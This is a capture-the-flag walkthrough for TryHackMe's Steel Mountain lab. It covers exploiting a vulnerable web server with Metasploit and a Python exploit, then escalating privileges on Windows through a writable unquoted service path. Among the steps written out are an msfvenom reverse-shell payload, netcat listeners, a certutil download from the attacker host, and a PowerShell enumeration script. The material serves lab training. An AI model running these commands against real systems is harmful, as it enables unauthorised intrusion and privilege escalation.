TryHackMe - Steel Mountain - Writeup

tryhackme.com/steelmountain

This post serves as a writeup for the TryHackMe.com Steel Mountain CTF.

Like any CTF machine, we start with an nmap scan for basic enumeration. I have written the nmap results to a .txt file so we can refer back to them later (note that -A already implies -sV and -O).

nmap -sV -O -p1-65535 -A -T4 --script=vuln -oN scan.txt <victim machine>

We can see that two HTTP web servers are running. If we open the default port 80 web server in a browser, we are greeted with a picture of the employee of the month.

1. We can find this employee's name, the answer to the first question, by viewing the page source and looking at the image's file name.

2. We can answer the second question with our nmap results.

3. By specifying --script=vuln we let nmap identify some of the vulnerabilities that may exist. In this case the answer to this question is further down in our nmap results.

4. To find the CVE number for this exploit I searched for the application and version number on www.exploit-db.com.

5. At this point we start Metasploit with the msfconsole command. Once Metasploit has started, search for that CVE by typing search <CVE number>. We then configure the exploit by setting LHOST, RHOSTS and RPORT (RPORT being the port of the vulnerable web server found by nmap). Once the exploit is configured, the run command executes it and grants us a meterpreter session. After some searching we find the user.txt file, which is the user flag.

6. Now that we have an initial shell we perform further enumeration to escalate our privileges. Download the PowerUp.ps1 script (part of the PowerSploit project). We can upload PowerUp with the upload command in our meterpreter session. To execute it, run load powershell and then powershell_shell; in the PowerShell prompt that opens, load the script with . ./PowerUp.ps1 and then run Invoke-AllChecks.

7. Locate the service that PowerUp reports with an unquoted service path, and note the full path of its binary (ASCService.exe). The overwrite that follows only works because our current user can write to that file, which is a separate weakness from the unquoted path itself; if PowerUp does not also report the file or its directory as modifiable, check the permissions before continuing.

Now we generate a reverse shell as a Windows executable with msfvenom. The exe-service format produces a binary that registers itself as a service, so the service control manager does not kill it immediately after start.

msfvenom -p windows/shell_reverse_tcp LHOST=<your machine> LPORT=1234 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

To overwrite ASCService.exe we must first stop the service. Press ctrl+c to leave the PowerShell channel, type shell to get a Windows command prompt, and run sc stop AdvancedSystemCareService9.

Once the service is stopped, press ctrl+c to return to the normal meterpreter prompt and upload ASCService.exe over the original binary, at the path PowerUp reported.

To catch the elevated session we need a netcat listener: nc -lnvp 1234.

Then return to shell and start the service: sc start AdvancedSystemCareService9.

8. In netcat you should now have a shell on the machine with elevated privileges. Search the Administrator's Desktop for root.txt.

Up until now we have utilized Metasploit to exploit this machine. We will now complete this room without the use of Metasploit.

This time we use the same CVE but a different exploit. This Python 2 exploit requires a simple Python web server, a netcat listener, and a Windows netcat binary. You must rename the netcat binary to "nc.exe" for this exploit to work. Additionally, the exploit must be executed twice.

Download the exploit and change the IP address to your local machine's IP and the port to 1234.

Download the netcat binary and change its name to "nc.exe".

Start a netcat listener on your local machine: nc -lnvp 1234.

Start a simple python server in the directory with the netcat binary and exploit file: python3 -m http.server 8080.

Execute the exploit twice: python2 39161.py <target ip> 8080.

The first stage of the exploit completes: the target fetches nc.exe from our web server.

9. The second stage of the exploit completes and nc.exe connects back to our listener. We have user-level access.

Instead of using PowerUp we will use WinPEAS to enumerate this system. 

Upload winPEAS with certutil, serving it from the same Python web server on port 8080: certutil -urlcache -f http://<attacking_machine_IP>:8080/winPEASx86.exe winPEAS.exe.

Execute winPEAS: .\winPEAS.exe servicesinfo.

winPEAS flags the same service we found with PowerUp.

10. The room asks us for the command to find this service name manually: powershell -c "Get-Service".
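The check behind step 7 (what PowerUp and winPEAS flag) and step 10 (finding it by hand) can be done with a few lines of PowerShell. The script below is an added example and is not code from the room or from this writeup: it queries Win32_Service (Get-Service alone does not show binary paths), keeps the services whose path is unquoted and contains a space, lists the shortened executables that the service control manager would try before the real one, and tests whether the current user can write to the real binary (the overwrite route taken above) or to any directory where one of those shortened executables could be dropped. Function names are mine; nothing about the target is assumed beyond a PowerShell 3.0 or later session.

```powershell
# Added example (not part of the room or the original writeup). Read-only: it only
# inspects service configuration and ACLs.

# True if the current user, or one of their groups, holds an Allow ACE carrying
# WriteData (CreateFiles for a directory) on $Path. Deny ACEs are not evaluated,
# so treat True as "worth trying", not as proof of write access.
function Test-AclWrite {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $me    = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids  = @($me.User) + @($me.Groups)
    $write = [System.Security.AccessControl.FileSystemRights]::WriteData
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
        catch { continue }   # pseudo-identities that cannot be translated to a SID
        if (($sids -contains $sid) -and (($ace.FileSystemRights -band $write) -ne 0)) { return $true }
    }
    return $false
}

# For an unquoted path such as C:\Program Files\Foo Bar\svc.exe, return the executables
# the service control manager tries first: C:\Program.exe, then C:\Program Files\Foo.exe.
function Get-HijackCandidate {
    param([string]$ExePath)
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $raw = $_.PathName
        if (-not $raw -or $raw.StartsWith('"')) { return }   # quoted paths are safe
        # Drop arguments: keep everything up to the first ".exe" (-match is case-insensitive).
        $exe = if ($raw -match '^(.*?\.exe)') { $Matches[1] } else { $raw }
        # "svchost.exe -k netsvcs" has a space only in its arguments; that is not vulnerable.
        if ($exe -notmatch ' ') { return }
        $candidates = @(Get-HijackCandidate $exe)
        [pscustomobject]@{
            Service          = $_.Name
            RunsAs           = $_.StartName          # e.g. LocalSystem
            BinaryPath       = $exe
            BinaryWritable   = Test-AclWrite $exe    # overwrite-the-binary route used above
            HijackCandidates = $candidates
            WritableDropDirs = @($candidates |
                ForEach-Object { Split-Path -Parent $_ } |
                Select-Object -Unique |
                Where-Object { Test-AclWrite $_ })
        }
    }
}

Get-UnquotedServicePath | Format-List
```

Run it from the powershell_shell channel, or from a plain command shell with powershell -ep bypass -File. A service with BinaryWritable set to True is the situation exploited in this writeup; a non-empty WritableDropDirs means the unquoted path alone is enough, by dropping a binary at one of the listed candidate names and restarting the service. RunsAs tells you whose privileges the payload will receive.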

11. Now repeat the steps to stop the service, overwrite ASCService.exe, and start the service again. You will have elevated (root) privileges on the netcat listener we set up earlier.

Thank you for reading this guide and feel free to explore my other writeups.